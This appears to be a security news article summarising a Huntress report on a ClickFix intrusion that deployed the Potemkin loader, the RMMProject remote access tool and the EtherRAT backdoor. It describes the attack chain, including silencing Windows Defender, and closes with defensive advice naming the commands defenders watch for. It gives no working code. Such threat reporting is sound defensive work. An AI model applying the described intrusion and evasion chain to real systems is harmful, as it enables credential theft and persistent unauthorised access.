ClickFix Campaign Deploys Potemkin Loader and EtherRAT in Multi-Stage Hands-On-Keyboard Attack
A ClickFix social-engineering campaign in May 2026 led to a full hands-on-keyboard intrusion, with attackers deploying the Potemkin loader and EtherRAT backdoor across 11+ hosts.
A single deceptive prompt was all it took for attackers to gain a foothold inside an organization, spread to over 11 systems, and deploy two separate remote access tools before anyone noticed. A new campaign using the ClickFix technique has shown how far one unguarded moment can go. Researchers at Huntress identified this ClickFix attack in May 2026, tracing it from a single unmonitored endpoint through a full hands-on-keyboard intrusion across the victim's network.
The infection began when a user visited a compromised website and ran a command that used pcalua.exe, a legitimate Windows utility, to silently fetch and run a remote script. That script downloaded and installed an MSI package in the background with no visible indication to the user. The MSI dropped a custom loader named Potemkin, which connected to a command-and-control server and loaded a fully featured remote access tool called RMMProject entirely in memory. Separately, the attacker deployed EtherRAT, a Node.js backdoor that retrieves its server address from the Ethereum blockchain, making it hard to disrupt through traditional domain takedowns.
Potemkin is a lean, purpose-built loader with a Domain Generation Algorithm that produces 10,000 candidate domains from a built-in word list and probes each one until it finds a live server. Once connected, its only job is to fetch and reflectively load RMMProject, a 4.4 MB DLL with 15 task types covering browser credential theft, cookie stealing across Chrome, Firefox, and Edge, a hidden remote desktop module, and process injection. Five hours later, the attacker dropped EtherRAT and set up a Cloudflare tunnel using a renamed copy of cloudflared, securing persistent internet-reachable access inside the network.
Once inside, a human operator took direct control and began working through the network manually. They used compromised Administrator credentials, ran reconnaissance consistent with the Impacket toolkit, and moved laterally to the domain controller via WMIExec and SMBExec. The goal was to spread EtherRAT across as many hosts as possible while establishing multiple fallback paths. The attacker worked hard to silence Windows Defender throughout the session, cycling through AMSI patches, registry policy writes, reflective in-memory loading, and exclusion path abuse before stopping the Defender service outright.
A reverse shell on port 43301 and multiple Chisel SOCKS tunnels gave the attackers layered persistence that could survive individual detections. Huntress recommended that organizations immediately audit endpoint coverage, since the whole intrusion started on a machine with no monitoring agent. Disabling the Windows Run dialog through Group Policy removes the ClickFix entry point, as the attack depends on the user pasting a command into that dialog. Teams should alert on cloudflared or renamed copies on endpoints, and treat Stop-Service WinDefend alongside bulk Add-MpPreference exclusion commands as high-confidence threat signals.
The ClickFix technique continues to evolve as a favored social-engineering vector, often paired with legitimate system utilities to bypass traditional defenses. This campaign demonstrates the increasing sophistication of initial access brokers who combine fake troubleshooting prompts with custom loaders and blockchain-anchored C2 infrastructure. Organizations should treat any unsolicited instruction to run commands from a web page as a high-risk event and ensure all endpoints have active monitoring agents deployed.